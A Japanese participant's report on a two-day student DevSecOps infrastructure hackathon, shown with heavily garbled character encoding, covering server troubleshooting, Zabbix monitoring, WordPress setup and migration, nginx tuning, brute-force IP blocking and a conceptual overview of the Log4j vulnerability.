[1] GWãðãDevSecOpsThon at GMO kitaQ
[1] GW ããã°ãªã¬ãŒ1æ¥ç®ã¯ããã«ãœã³ã®åå ã¬ããŒãã«ãªããŸãã ============================== ïŒæ29ã30æ¥ åä¹å·åžãåŸæŽããåŠçåãã€ã³ã¿ãŒãããã€ã³ãã©ããã«ãœã³ãDevSecOpsThon at GMO kitaQãã«åå ããŠããŸããã
[1] GWãðãDevSecOpsThon at GMO kitaQ
[1] GW ããã°ãªã¬ãŒ1æ¥ç®ã¯ããã«ãœã³ã®åå ã¬ããŒãã«ãªããŸãã
==============================
ïŒæ29ã30æ¥ åä¹å·åžãåŸæŽããåŠçåãã€ã³ã¿ãŒãããã€ã³ãã©ããã«ãœã³ãDevSecOpsThon at GMO kitaQãã«åå ããŠããŸããã
ã€ãã³ã詳现
DevSecOpsThonããšã¯ããéçºïŒdevelopmentïŒããã»ãã¥ãªãã£ïŒsecurityïŒããéçšïŒoperationïŒãã®
3ã€ã®èŠçŽ ãèåããDevSecOpsãåŠã³ãªãããããŒã ã§ååããŠç¹å®ã®ãé¡ã«ææŠããã³ã³ãã¹ãã§ãã
åŒç€Ÿã®DevSecOpsThonã®ç¹åŸŽãšããŠããµãŒããŒæ§ç¯ã»éçšã«çŠç¹ãåœãŠãã³ã³ãã³ããäžå¿ã«ããŠãããåŠçåãã®éå¬ã§ããçãããããŸãã
æšå¹Žãããã³ã³ãã³ããã¢ããã°ã¬ãŒãããæéã2æ¥éã«éçŽããŠãå±ãããŸãã
ãã詳ããã¯ä»¥äžã®ãªã³ã¯ãã...
(URL : https://www.gmo.jp/news/article/8272/)
ç®æ¬¡
1æ¥ç®
åé¡ïŒâª1
åé¡ïŒâª2
åé¡ïŒâª3
åé¡ïŒâª4
åé¡ïŒâª5
åé¡ïŒâª6
åé¡ïŒâª7
2æ¥ç®
åé¡ïŒâª8
åé¡ïŒâª9
åé¡10âª10
ããšããâªAtogaki
Report
ïŒæ¥ç®
1. åé¡ïŒ
åé¡
ã€ã³ã¿ãŒãããäžã§å ¬éãããŠãã ãšããäŒç€Ÿ WEBãµã€ãã®æ£åžžçšŒåã確èªãããããäžããããLinuxã®ç£èŠãµãŒããŒäžããå€éšã®webãµãŒããŒã®ã³ã³ãã³ããååŸãããã
以äžã®ããã«ã³ãã³ãã©ã€ã³ãã curl ã³ãã³ããå©çšããŠHTTPã§ã³ã³ãããååŸããã€ãã§æž¡ã㊠xmllint ã³ãã³ãã§HTMLãããŒã¹ããŠãµã€ãã®ã¿ã€ãã«ãæœåºããç®çã®ãµã€ããæ£åžžã«è¡šç€ºãããŠããããšã確èªãã
$ title="$(curl -sL http://www.ãšãã.jp | xmllint --html --xpath '/html/head/title/text()' - 2>/dev/null)"
$ echo ${title}
ãã¹ã
ããã©ãããæ§åããããããæåŸ ãããã¬ã¹ãã³ã¹ã¯ãšããã°ã«ãŒãã®ã³ãŒãã¬ãŒãWEBãµã€ãã®ã¿ã€ãã«ããšããäŒç€Ÿãã§ãããã©ããããã¹ã段éã®ã³ã³ãã³ãã衚瀺ãããŠããŸã£ãŠããããã ã
æåŸ ãšã¯éãã¬ã¹ãã³ã¹ãåŸãããçç±ã調æ»ããæšå®ããã
æšå®ã«åºã¥ããcurl ã³ãã³ã㧠"http[://]www[.]ãšãã[.]jp" ã«æ¥ç¶ããæ³å®ãããæ£ããã¬ã¹ãã³ã¹ããšããäŒç€ŸããåŸãã
解決æ¹æ³
DNSã®èšå®ãå éšãµãŒããŒåãã«ãªã£ãŠããã®ã§ãCloudFlare DNSã®1.1.1.1ã®èšè¿°ã/etc/resolv.confã«è¿œèšããŸããã
2. åé¡ïŒ
åé¡
ã€ã³ã¿ãŒãã«IP / ã°ããŒãã«IP ãå²ãæ¯ãããŠãã2å°ã®ãµãŒããŒãããã
ãããè€æ°åã®ãã¹ã¯ãŒããã¹ã«ããSSHäžå¯ãçºçããã®åå ãèŠã€ã解æ¶ããŠãã ããã
-
Aruto(äŒå Ž)ããq3-[ ]-01 / q3-[ ]-02ãžã®SSHã¯å¯èœãªç¶æ ã§ãã
-
q3-[ ]-01ããq3-[ ]-02ãžã®SSHã¯å¯èœãªç¶æ ã§ãã
-
q3-[ ]-02ããq3-[ ]-01ãžã®SSHãäžå¯èœç¶æ ã§ãã
ãSSHå¯èœã ã»Aruto(äŒå Ž)ãâãq3-[*]-01 ã»Aruto(äŒå Ž)ãâãq3-[*]-02 ã»q3-[*]-01ãâãq3-[*]-02 ãSSHäžå¯ã ã»q3-[*]-02ãâãq3-[*]-01
æ§æå³
解決æ¹æ³
fail2banã®èšå®ã以äžã®ã³ãã³ãã§unbanãã.
[root@q3-x-01 ~]# fail2ban-client status sshd
Status for the jail: sshd
|- Filter
| |- Currently failed: 0
| |- Total failed: 9
| `- Journal matches: _SYSTEMD_UNIT=sshd.service + _COMM=sshd
`- Actions
|- Currently banned: 1
|- Total banned: 3
`- Banned IP list: 192.168.144.71
[root@q3-x-01 ~]# fail2ban-client set sshd unbanip 192.168.144.71
[root@q3-x-01 ~]# firewall-cmd --reload
success
3. åé¡ïŒ
åé¡
webãµãŒããšdbãµãŒããæ§ç¯ããŠãwordpressãåããããšããŠããŸãã
ãµãŒãã¯ããããã°ããŒãã«ãšã€ã³ã¿ãŒãã«ã®IPãæã¡ãã»ãã¥ãªãã£ã®ããããŒã¿ããŒã¹ã¯ã€ã³ã¿ãŒãã«ããã®ã¿æ¥ç¶å¯èœãªããã«èšå®ããããšããŠããŸãã
çŸåšwebãµãŒããŒãdbãµãŒããŒãšãã«éäžãŸã§äœæ¥ãé²ãã ç¶æ ã§ãæ§ç¯æ åœè ãçªç¶å€±èžªããŠããŸããŸãããç¶ãã®èšå®ãå®äºããŠwordpressã®åæç»é¢ã衚瀺ã§ããããã«ããŠãã ããã
æ§ææ å ±
OSã¯Ubuntu 22.04ã䜿ã£ãŠããŸãã
| HOSTNAME | GLOBAL-IP | INTERNAL-IP | USER-ID | USER-PASS |
| q1--web | 1++.++.++.+ | 192.168.144.* | root | åå¥éç¥ |
| q1--db | 1++.++.++.* | 192.168.144.* | root | åå¥éç¥ |
webãµãŒãäœæ¥æŠèŠ
- apacheã€ã³ã¹ããŒã«æžã¿
- phpã€ã³ã¹ããŒã«æžã¿
- wordpressã®ããã±ãŒãž/var/www/html以äžã«å±éæžã¿
- configãã¡ã€ã«ãžDBãžã®æ¥ç¶æ å ±èšå®æžã¿
dbãµãŒãäœæ¥æŠèŠ
- mariadbã€ã³ã¹ããŒã«æžã¿
- wordpressçšããŒã¿ããŒã¹äœææžã¿
- wordpressçšDBãŠãŒã¶äœææžã¿
æ§æå³
解決æ¹æ³
DBãšWebã®2ã€ã®ãµãŒããŒãæž¡ããã
æ
åœè
ã倱螪ãããããã
Web
- ããŒã解æ³
[root@q3-a-01 ~]# firewall-cmd --reload
$ ufw allow 80/tcp
$ ufw allow 3306
$ ufw reload
- IPã¢ãã¬ã¹ã®èšå®
vim /etc/network/interfaces
ã§ä»¥äžãè¿œå
auto eth1
iface eth1 inet static
address 192.168.144.41
netmask 255.255.255.0
ãã®åŸã«ã€ã³ã¿ãŒãã§ã€ã¹ãupãã
$ ip link set eth1 up
- WordPressã®èšå®
以äžã®èšå®ã«åŸã£ãã
Install and configure Wordpress
wordpress.conf
root@q1-a-web:~# cat /etc/apache2/sites-available/wordpress.conf
<VirtualHost *:80>
DocumentRoot /var/www/html
<Directory /var/www/html>
Options FollowSymLinks
AllowOverride Limit Options FileInfo
DirectoryIndex index.php
Require all granted
</Directory>
<Directory /var/www/html/wp-content>
Options FollowSymLinks
Require all granted
</Directory>
</VirtualHost>
root@q1-a-web:~#
DB
- ããŒãéæŸ
$ ufw allow 3306
$ ufw reload
- ufwã䜿çšããæ¥ç¶ã®IPãã£ã«ã¿ãªã³ã°
$ ufw allow from 192.168.144.0/24 to any port 3306
$ ufw reload
4. åé¡ïŒ
åé¡
ã€ã³ã¿ãŒãã«/ã°ããŒãã«ãšãã«IPãå²ãæ¯ãããŠãã2å°ã®ãµãŒããŒãããã
1å°ã¯webãµãŒããŒãšããŠäœ¿çšãããŠããã
webãµãŒããŒã®è² è·ãç£èŠã§ããããã«ããã1å°ã«ç£èŠãµãŒããŒãæ§ç¯ããŠããã
ãµãŒããŒæ§ç¯æ
åœè
ãçªç¶å€±èžªããŠããŸã£ãŠãããèå¿ã®ç£èŠèšå®ãã§ããŠããªãã
ãã®ãŸãŸã§ã¯serviceãæ£åžžã«çšŒåã§ããŠãããåãããªãã
è³æ¥ãäžèšã®ç£èŠèšå®ãè¡ãã
:::info
ç£èŠèšå®ãè¡ãé åºã«ã€ããŠã¯é äžåã§ãïŒ
ããŒã å šå¡ã§1ã€ã®ç£èŠèšå®ãããã®ããããŒã å ã§æåãããã®ãOKïŒ
å šãŠã®ç£èŠèšå®ãã§ããããã«é 匵ã£ãŠãã ããïŒ
:::
ç£èŠèšå® äžèŠ§
1.æ»æŽ»ç£èŠ
webãµãŒããŒã«å¯ŸããŠã10ç§ããšã«æ»æŽ»(ping)ç£èŠãè¡ãã
5åé£ç¶äžéã«ãªã£ãå Žåããã©ãŠã¶ã®ZABBIXã³ã³ããäžã§ã¢ã©ãŒã衚瀺ããããã
ãã©ãŠã¶ã®ZABBIXã³ã³ããäž/
ãããã¯é害ã¿ãã§ã¢ã©ãŒã衚瀺ã§ããŠãããã£ããã£ãäžç·ã«å ±åããã
:::tip
ãã³ãïŒã·ã³ãã«ãã§ãã¯
:::
2.ã¡ã¢ãªã®ããã©ãŒãã³ã¹ç£èŠ
webãµãŒããŒã®ã¡ã¢ãªäœ¿çšçãç£èŠããã
䜿çšç80ïŒ
ãè¶
ããå Žåããã©ãŠã¶ã®ZABBIXã³ã³ããäžã§ã¢ã©ãŒã衚瀺ããããã
ãã©ãŠã¶ã®ZABBIXã³ã³ããäž/
ãããã¯é害ã¿ãã§ã¢ã©ãŒã衚瀺ã§ããŠãããã£ããã£ãäžç·ã«å ±åããã
:::tip
ãããã³ãïŒèŠzabbix-agentèšå®
:::
3.CPUã®ããã©ãŒãã³ã¹ç£èŠ
webãµãŒããŒã®CPUã®äœ¿çšçãç£èŠããã
䜿çšçã80ïŒ
ãè¶
ããå Žåããã©ãŠã¶ã®ZABBIXã³ã³ããäžã§ã¢ã©ãŒã衚瀺ããããã
ãã©ãŠã¶ã®ZABBIXã³ã³ããäž/
ãããã¯é害ã¿ãã§ã¢ã©ãŒã衚瀺ã§ããŠãããã£ããã£ãäžç·ã«å ±åããã
:::tip
ãããã³ãïŒèŠzabbix-agentèšå®
:::
4.Networkã®ããã©ãŒãã³ã¹ç£èŠ
webãµãŒããŒäžã®ãããã¯ãŒã¯ãã©ãã£ãã¯ã10ç§ããšã«ç£èŠãã
åä¿¡/éä¿¡ãããããé£ç¶6å以äžäœ¿çšç50ïŒ
以äžã®å Žåã«ããã©ãŠã¶ã®ZABBIXã³ã³ããäžã§ã¢ã©ãŒã衚瀺ããããã
ãã©ãŠã¶ã®ZABBIXã³ã³ããäž/
ãããã¯é害ã¿ãã§ã¢ã©ãŒã衚瀺ã§ããŠãããã£ããã£ãäžç·ã«å ±åããã
:::tip
ãããã³ãïŒèŠzabbix-agentèšå®
:::
5.ãµãŒãã¹ç£èŠ
webãµãŒããŒã®nginx serviceã®çšŒåç¶æ
ãç£èŠããã
ãµãŒãã¹ãåäœããŠããªãå Žåããã©ãŠã¶ã®ZABBIXã³ã³ããäžã§ã¢ã©ãŒã衚瀺ããããã
ãã©ãŠã¶ã®ZABBIXã³ã³ããäž/ãããã¯é害ã¿ãã§ã¢ã©ãŒã衚瀺ã§ããŠãããã£ããã£ãäžç·ã«å ±å
:::tip
ãããã³ãïŒèŠzabbix-agentèšå®
:::
6.webããŒãžã®å¿çæéã®ç£èŠïŒ
zabbixã®webscenarioæ©èœã䜿ããWebããŒãžãhttp[://]WebãµãŒããŒIPãã®èªã¿èŸŒã¿æéãç£èŠããã
èªã¿èŸŒã¿æéã1ç§ãããããå Žåã«ããã©ãŠã¶ã®ZABBIXã³ã³ããäžã§ã¢ã©ãŒã衚瀺ããããã
ãã©ãŠã¶ã®ZABBIXã³ã³ããäž/ãããã¯é害ã¿ãã§ã¢ã©ãŒã衚瀺ã§ããŠãããã£ããã£ãäžç·ã«å ±å
:::tip
ãããã³ãïŒwebã·ããªãª
:::
7.webããŒãžã®å¿çæéã®ç£èŠïŒ(ãªãã€ã¬ã¯ã察å¿)
zabbixã®webscenarioæ©èœã䜿ãããªãã€ã¬ã¯ãããWebããŒãž
ãhttp[://]WebãµãŒããŒIP:50080ãã®èªã¿èŸŒã¿æéãç£èŠããã
èªã¿èŸŒã¿æéã1ç§ãããããå Žåã«ããã©ãŠã¶ã®ZABBIXã³ã³ããäžã§ã¢ã©ãŒã衚瀺ããããã
ãã©ãŠã¶ã®ZABBIXã³ã³ããäž/ãããã¯é害ã¿ãã§ã¢ã©ãŒã衚瀺ã§ããŠãããã£ããã£ãäžç·ã«å ±å
:::tip
ãããã³ãïŒïŒãšã»ãã®å°ãã®éã
:::
8.ãµãŒããŒã®SSHãã°ç£èŠ
webãµãŒããŒã®SSHã®ãã°ãç£èŠããã
èªèšŒå€±æã®ãã°ããã£ãå Žåã«ããã©ãŠã¶ã®ZABBIXã³ã³ããäžã§ã¢ã©ãŒã衚瀺ããããã
ãã©ãŠã¶ã®ZABBIXã³ã³ããäž/
ãããã¯é害ã¿ãã§ã¢ã©ãŒã衚瀺ã§ããŠãããã£ããã£ãäžç·ã«å ±åããã
:::tip
ãããã³ãïŒActive Check
:::
9.ã¢ã©ãŒãã®éç¥ïŒã¡ãŒã«
WebãµãŒããŒã®ã¢ã©ãŒããæ€ç¥ãããéã«ã¡ãŒã«ãéä¿¡ããã
éä¿¡å
/å
ã®ã¢ãã¬ã¹ã¯äžèšãšããã
ã¡ãŒã«ãµãŒããŒïŒ192.168.144.254
éä¿¡å
ïŒteam-X@devsecopsthon.*
éä¿¡å
ïŒtema-atruto@+++.*
:::tip
ãããã³ãïŒãŠãŒã¶ãŒã¡ãã£ã¢
:::
10.ã¢ã©ãŒãã®éç¥ïŒSlack
ã¢ã©ãŒããæ€ç¥ãããéã«Slackãžã¢ã©ãŒãã¡ãã»ãŒãžãåºåããã
:::tip
ãããã³ãïŒSlack-API
:::
解決æ¹æ³
æ°åã§zabbix_agentãçãè¿ãããã
æ
ç·ãäžå®å®ã ã£ããæ°åã§ããªã¬ãŒããã«ããã«ãããŠãã«ããã«ãããŠãã
課é¡4ã®å°å2çªã®ã²ãšã€ã解ããªãã£ãã
èªåã®å®¶ã®ãµãŒããŒäžã§ãã®ç°å¢ãåçŸããŠã¿ãããã
5. åé¡ïŒ
åé¡
WordPressã®ãã°ã€ã³ããŒãžã«äžæ£ãªã¢ã¯ã»ã¹ãã©ã€ãããã
ã»ãã¥ãªãã£åäžã®ããã«ã該åœã¢ã¯ã»ã¹ã確èªããŠå¯ŸçããŸãããïŒ
æ£åžžãªã¢ã¯ã»ã¹ãžåœ±é¿ãåºããã«äžæ£ãšæãããIPãå
šãŠé®æããŠå ±åããŠãã ããïŒ
äœæ¥ç°å¢
OSïŒUbuntu 20.04.3 LTS
äžèšã€ã³ã¹ããŒã«æž
nginx version: nginx/1.23.4
wordpress-6.2
php 7.4
mysql Ver 15.1 Distrib 10.3.38-MariaDB
解決æ¹æ³
æ£åžžIPïŒ
+++.++.+.18ã
+++.++.+.55ã
+++.++.+.238
æ»æIPïŒ
äžèšä»¥å€ã®+++.++.*.0/24
ã»æ»æè ã¯IDåºå®ã§ã¢ã¯ã»ã¹ã®ãã³ã«ãã¹ã¯ãŒããå€ããŠããŸãã
ã»æ»æè ã®ãŠãŒã¶ãšãŒãžã§ã³ããèŠããšã¢ã¯ã»ã¹æ¯ã«ç°ãªã£ãŠãããäžå¯©ã§ãããšçããã
ã»æ£åžžãªã¢ã¯ã»ã¹ã¯ID/PASSãšãã«å ±æãããã®ã«ãªã£ãŠããŸãã
å人çãªææ³
ïŒç§éã«500ã¢ã¯ã»ã¹ããããªã人åã§ããã®ãäžçªæã£åãæ©ããšæããŸããã
ã¢ã¯ã»ã¹ãã°ã解æããã ãã§ãæ£åžžIPãšæ»æIPã®çžéç¹ãèŠããŠããã®ã§ã¯ãªãããªãã
ãŸãããæ£åžžãªã¢ã¯ã»ã¹ã¯ID/PASSãšãã«å
±æãããã®ã«ãªã£ãŠããŸãããšããéšåã§ããããèŠãŠå€æããã®ããšæåããŸãããåŠã³ã§ãã
6. åé¡ïŒ
åé¡
ä»ã·ã¹ãã ãã移è¡ããŠããwordpressã®ãµã€ããé ããšã®ããšã
ãããäžã®æ å ±ã§ãã¥ãŒãã³ã°ãããå€ãããªãã®ã§ããã¥ãŒãã³ã°ããŠæ¬²ãããšäŸé ŒããããŸããã
ãå€ãã®ã¢ã¯ã»ã¹ã«å¯ŸããŠããæ£ããå¿çãè¿ããããšãç®æããŠãã¥ãŒãã³ã°ãå®æœã㊠ãã ããã ã¢ã¯ã»ã¹ã¯ãµã€ãã®ãããããŒãžã ãã§ã¯ãªããååå¥ã®èšäºã«ãè¡ãããŸãã
èšæž¬ã¿ã€ãã³ã°ã¯å
š4åå®æœãããŸãã
ååã¯ä»ã®ãµã€ãã®ç¶æ
ã確èªããŠã¿ãŠãã ããã
ãã®åŸã2åã®äžéèšæž¬ãšãæçµèšæž¬ããããŸãã
èšæž¬æã«ãã³ãã¯ã·ã§ã³ãšã©ãŒãªã©ã®failedã10%以äžorã¬ã¹ãã³ã¹ã¿ã€ã 3ç§è¶
éã5%以äž
ããŸããšãèšæž¬ãèªåçã«æ¢ãŸããŸã
解決æ¹æ³
ç§ãã¡ã®ããŒã ã¯php-fpmã®èšå®ãããããããŸããã
ããçµæã¯...
é©ç°ã®ïŒïŒ
ãšãªã£ãŠããŸãããã
ãŸã è©ŠããããŠããªãã®ã§ãèªå®
ã®ãµãŒããŒã«åæ§ã®ç°å¢ãæ§ç¯ããå®å
šåçŸããã
ããnginxã®æ°æã¡ãç¥ã£ãŠããããã§ãã
倧äŒåŽã®åç
äžèšãªã©ãåèã«ããŠã¿ãŠãã ãã
https://qiita.com/mikene_koko/items/85fbe6a342f89bf53e89
以äžãã¡ã€ã«ã¯ããã©ã«ãå€ããå€æŽãããŠãããŸããã
/etc/nginx/nginx.conf
events {
worker_connections 1024;
}
â
worker_processes 1;
worker_rlimit_nofile 30;
events {
worker_connections 40;
}
keepalive_timeout 65;
â
keepalive_timeout 0;
/usr/lib/systemd/system/nginx.service
LimitNOFILE=24 ãè¿œèš
/etc/php/7.4/fpm/php-fpm.conf
process.max = 2
â
process.max = 1
/etc/php/7.4/fpm/pool.d/www.conf
pm.max_requests = 10ãè¿œèš
è£è¶³
ã³ã³ãã³ãã®æŽæ°ãç¡ãããšãåãã£ãŠããå Žé¢ã§ã¯ãmysqlã®ã¯ãšãªãã£ãã·ã¥ãfastcgi_cacheãå¹æã倧ããã§ãã
7. åé¡ïŒ
â» WARNING
æ¬å
容ã¯ã»ãã¥ãªãã£ã«é¢ããç¥èŠãåºãå
±æããç®çã§å·çãããŠãããè匱æ§ã®æªçšãªã©ã®æ»æè¡çºãæšå¥šãããã®ã§ã¯ãããŸããã
èš±å¯ãªããããã¯ãã«æ»æãå ãããšç¯çœªã«ãªãå¯èœæ§ããããŸãã
ããèšèŒãããæ
å ±ãåç
§ã»æš¡å£ããŠè¡ãããè¡çºã«é¢ããŠçè
ã¯äžå責任ãè² ããŸããã
åé¡
çç¥
課é¡è©³çŽ°
2021幎 12æ5æ¥ã« Apache Log4j ãšãã Java ã®ãã°åºåã©ã€ãã©ãªã«è匱æ§ãèŠã€ãã£ããšå ¬éãããŸããã
ãã®è匱æ§ã¯ãé éã®ç¬¬äžè ã现工ããããŒã¿ãéãããšã§ãä»»æã®ã³ãŒãã»ã³ãã³ããå®è¡ã§ãã ãšãããã®ã§ãé倧床ã瀺ãã¹ã³ã¢ã«ã¯æ倧㮠10.0 ãä»ããããŸããã
çãããåç¥ã®éããJava ã¯æåãªããã°ã©ãã³ã°èšèªã§ããã éå»ã«ã¯ 30åã®ããã€ã¹ã§èµ°ãJava ãšãããã£ãããã¬ãŒãºãä»ããããŠããããšããåç¥ã®æ¹ãããã£ãããã§ããããã·ã¹ãã ã¯åºæ¬çã«ãã°ãåºåãããã®ã§ãããããæåãªããã°ã©ãã³ã°èšèªã®åºæ¬çãªæ©èœã«è匱æ§ãèŠã€ãã£ãããšã®åœ±é¿ã¯å€§å€å€§ããªãã®ã§ãããå®éãã¢ã¡ãªã«æ¿åºãè€æ°ã® IT äŒæ¥ãæéããäŒè°ãéããããNHK ã§å ±éããããäžçäžã§è©±é¡ã«ãªããŸããã
ãã® Apache Log4j ã®è匱æ§ããããŸã§è©±é¡ã«ãªã£ãã®ã¯ãè匱æ§ã®æ·±å»åºŠãè¡šãã¹ã³ã¢ (CVSS) ãé«ãããšããåºã䜿ãããŠãã OSS ã«è匱æ§ããã£ãããšããã¡ããããã§ãããè匱æ§ã®æªçšãæ¯èŒç容æã ã£ãããšãæããããŸããå®éãã©ã®ãããªæ¹æ³ã§æ»æãå¯èœãªã®ããå°ã詳现ãèŠãŠã¿ãŸãããã
Log4j ã«ã¯ãã°ã«èšèŒãããæååããäžéšã®å€ãå€æ°ãšããŠè©äŸ¡ãã Lookup æ©èœãå®è£ ãããŠããŸããæ¬è匱æ§ã¯ãã®æ©èœã®ãã¡ JNDI Lookup ãšããæ©èœãæªçšãããã®ã§ããäŸãã° Web ãµãŒãã®å ŽåãHTTP ãªã¯ãšã¹ãã®ã¡ãœããããã¹ãããããŒãªã©ããã°ã«æžã蟌ãããšããããŸããããã®ãšããã°ã«å«ãŸããå€éšã® URL ãããã¯å éšãã¹ãã Java ã¯ã©ã¹ãã¡ã€ã«ãååŸ (ãã·ãªã¢ã©ã€ãº) ããå®è¡ããŠããŸããšãããã®ã§ãã
ãã®è匱æ§ã䜿ã£ãæªçšã®äŸãšããŠãã©ã³ãµã ãŠã§ã¢ãžã®ææããä»®æ³é貚ã®ãã€ãã³ã°ãã«ãŠã§ã¢ã®å±éãæ©å¯æ å ±ãçã¿åãããšãªã©ãèããããŸãã
解決æ¹æ³
課é¡6
- ãã®å°åã«ã€ããŠã¯éäžãŸã§ã§ããŠããã¿ããã§ãããä»ã®ããŒã ã¡ã€ãã解ããŠãããããå®ãã§ã¯ãããŸããã
2.ä»ååãäžããŠããè匱æ§ã® CVE èå¥çªå·
CVE-2021-44228
-
ä»ååãäžããè匱æ§ã®åœ±é¿ç¯å²ïŒããŒãžã§ã³çªå·ïŒ
Apache Log4j-core 2.15.0ããåã®2ç³»ã®ããŒãžã§ã³ -
ä»ååãäžãããœãããŠã§ã¢ã®è匱æ§ãèŠã€ãã£ãããšããã圱é¿ã®ãã£ããµãŒãã¹ããŸãã¯äŒæ¥åã 3 ã€
(äŸ)
ã»ãµãŒãã¹/äŒæ¥å (ãœãŒã¹ãšãªãURLå«ã)
ã»VMware / VMware, Inc
(https://www.vmware.com/security/advisories/VMSA-2021-0028.html)
ã»JAVA ç / MINECRAFT
ïŒhttps://www.minecraft.net/ja-jp/article/important-message--security-vulnerability-java-edition-jpïŒ
ã»Oracle Cloud / Oracle
(https://www.oracle.com/security-alerts/alert-cve-2021-44228.html#Appendix3RD)
ïŒæ¥ç®
8. åé¡ïŒ
åé¡
課é¡å 容
ã¿ãªãã㯠Wordpress ã VM äžã«çšŒåãããŠããŸãã
ãšããçç±ã«ãããå¥ã® VM ã«ç§»è¡ (ãåŒè¶ã) ãããããšèããŸããã
ã§ããã ãããŠã³ã¿ã€ã (䜿ããªãæé) ç¡ããç®æããŠç§»è¡ãå®äºãããŠãã ããã
移è¡å
ã® VM ã«ã¯ Web ãµãŒããããŒã¿ããŒã¹ã¯ã€ã³ã¹ããŒã«æžã¿ã§ãããèšå®ã¯ããŠãããŸããã
ããŒã Aã®å Žåã
移è¡å
ãq8-a1
移è¡å
ãq8-a2
VM å ã§ã¯ããŒã¿ããŒã¹ãåãããŠããããããã¡ãã移è¡ãããŠãã ããã
èšäºã«å¯Ÿããã³ã¡ã³ãæçš¿æ©èœã«ã€ããŠã¯ä»åã®èª²é¡ã§ã¯èæ ®ããªããŠå€§äžå€«ã§ãã(ç¡å¹ã«ããŠãããŸã)
ãŸããå®éã«å ¬éããŠãããµãŒãã¹ã® IP ã®å€æŽã䌎ã移è¡äœæ¥ã®å ŽåãDNS ã®å€æŽãå¿ èŠã§ã
ãã®å€æŽéšåãå®éã«è¡ã£ãŠã¿ãŸããããããã§èšå®ãã IP ã¢ãã¬ã¹ã¯ ãã©ã€ããŒã IP ã¢ãã¬ã¹ã§ãé¡ãããŸãã
hosts ã«èšå®ããã®ã¯ã°ããŒãã« IP ã¢ãã¬ã¹ã§ãããDNS ã®èšå®ã¯ ãã©ã€ããŒã IP ã¢ãã¬ã¹ãšãªããŸã
ãŸãšã
- Wordpress ããã³ããŒã¿ããŒã¹ã移è¡å
VM ãžãšç§»è¡ãã
- 移è¡å VM 㧠WordpressãããŒã¿ããŒã¹ã®èšå®ããã
- DNS ã¬ã³ãŒããå€æŽãã
- 移è¡å®äºåŸãéå¶ãŸã§å ±åããã
åè URL
- https://ja.wordpress.org/support/article/how-to-install-wordpress/
- https://ja.wordpress.org/support/article/editing-wp-config-php/
- https://www.conoha.jp/lets-wp/wp-backup/
課é¡ãå§ããåã«è¡ã£ãŠã»ããããš
hosts ãã¡ã€ã«ã®å€æŽ
Wordpress ã«éããããµãŒãã¹ãã€ã³ã¿ãŒãããã«å ¬éããå Žåãåºæ¬çã«ãã¡ã€ã³ãã»ããã«ãªã£ãŠããã®ãã»ãšãã©ã§ãã
ä»åã¯ã¿ãªããã® hosts ãã¡ã€ã«ãä¿®æ£ããŠãããããã¡ã€ã³åã§ã¢ã¯ã»ã¹ã§ããããã«ããŠããã ããã°ãšæããŸãã
LinuxãšMAC ã®å Žå㯠/etc/hosts
ã«ãWindows ã®å Žå㯠C:\Windows\System32\drivers\etc\hosts
ãå€æŽããŠãã ãã
+++.++.37.127 mng.aru.local
+++.++.37.126 www.x.aru.local
æ§ææ å ±
åãµãŒãã®æ å ±ã«ã€ããŠ
管çãµãŒã
- DNS æš©åšãµãŒã
- Uptime kuma
DNS ã¬ã³ãŒããä¿®æ£ã§ããããã«ãWeb UI ãçšæããŠããŸã
http://mng.aru.local:9191/
ãã°ã€ã³ãŠãŒã¶åããã¹ã¯ãŒãã¯ä»¥äžã®æ§ææ å ±ãã確èªãã ãã
åãµãŒãã®ããŠã³ã¿ã€ã ãç£èŠãããããUptime Kuma (https://github.com/louislam/uptime-kuma) ã䜿çšããŠããŸã
ãã¡ãã§ã¿ãªããã®ãµãŒããå©çšå¯èœãªç¶æ ã«ãªã£ãŠããã確èªããŸãã
äž»ã«éå¶åŽãå©çšããŸã
http://mng.aru.local:3001/status/x
Wordpress åæããŒãž
http://www.x.aru.local/wordpress
åå è ãµãŒã
ã¿ãªããã«ãé ãããŠãããµãŒãã«ã¯ã以äžãã€ã³ã¹ããŒã«æžã¿ã§ã
- Apache 2.4.41
- Nginx 1.18.0 (åæ¢ç¶æ )
- PHP 7.4.3
- MariaDB 10.3.38
- PHPMyAdmin 4.9.5
ãŸãã移è¡å
ãµãŒãã«ã¯ Wordpress ããŒã¿ã /var/www/html/wordpress
ã«é
眮ããŠããŸã
解決æ¹æ³
scpã§ããŒã¿ã ã移è¡ããŠãäž¡æ¹ã«ã¢ã¯ã»ã¹ãããçæ¹ã®TTLã5ååŸãTTL 1minute
ã«ããæçµçã«ç§»è¡å
ã«ã ãã¢ã¯ã»ã¹ãããããã«ããŸããã
DNS浞éã«ã€ããŠãèæ ®ããŸãããããã®æ¡ä»¶äžã§ã¯æå³ããã£ãã®ããªãã£ãã®ããã©ããªã®ã ãããããUptime-kumaã®pingãé£ã°ãééãåæèšå®ã ãš60ïœããšã«ãªã®ã§ãããããèæ ®ãããšãæå³ã¯ãªããããªããããããŒãã
9. åé¡ïŒ
åé¡
ããªãã¯webãµãŒã(AlmaLinuxã®ããŒã«ã«ãã©ãŒ)ã®ç®¡çæ åœè ã§ãã
æ¥é±ã»ãã¥ãªãã£ç£æ»ããããšã®é£çµ¡ããã£ãããããµãŒãã®ã«ãŒãã«ãã¢ããããŒãããŸããã
ãã®åŸã«ãµãŒããåèµ·åãããšãããããŒã«ã«ãã©ãŒãµã€ãã®ã³ã³ãã³ããæ¶å€±ããŠããŸããŸããã
äœãèµ·ããŠããã®ãåå ã調æ»ããæ°ããã«ãŒãã«ã§èµ·åããŠãããŒã«ã«ãã©ãŒãµã€ãã衚瀺ã§ããããã«ä¿®æ£ããŠãã ããã
以äžã®URLã§å ã®ãµã€ãã衚瀺ãããã°OKã§ãã
http://<ããŒã ã®GlobalIP>/
èµ·åç»é¢ç¢ºèªã®ããwebã³ã³ãœãŒã«ãçšæãããŠããŸã
(æ®éã«ã¯ãªãã¯ãããšããŒãžå
é·ç§»ã«ãªã£ãŠããŸãæ£ãã衚瀺ãããªãããšãããã®ã§ããã®æã¯å³ã¯ãªãã¯ã®ã¡ãã¥ãŒçããå¥ã¿ãã§éããã³ããŒããŠå¥ã¿ãã«ããŒã¹ãããçã§éããŠãã ãã)
<http[://]+++.++.++.+:50090/>
ãã¡ãããèªããŒã çšã®URLãçºè¡ããã¢ã¯ã»ã¹ããŠãã ããã
解決æ¹æ³
yum update kernel-devel
dkms install -m zfs -v 2.1.9 -k 4.18.0-425.19.2.el8_7.x86_64
modprobe zfs
zpool import
zpool import zpool1
äžèš3ã€ãã¹ãŠOKã§ã¯ãªã¢
uname -e çµæ
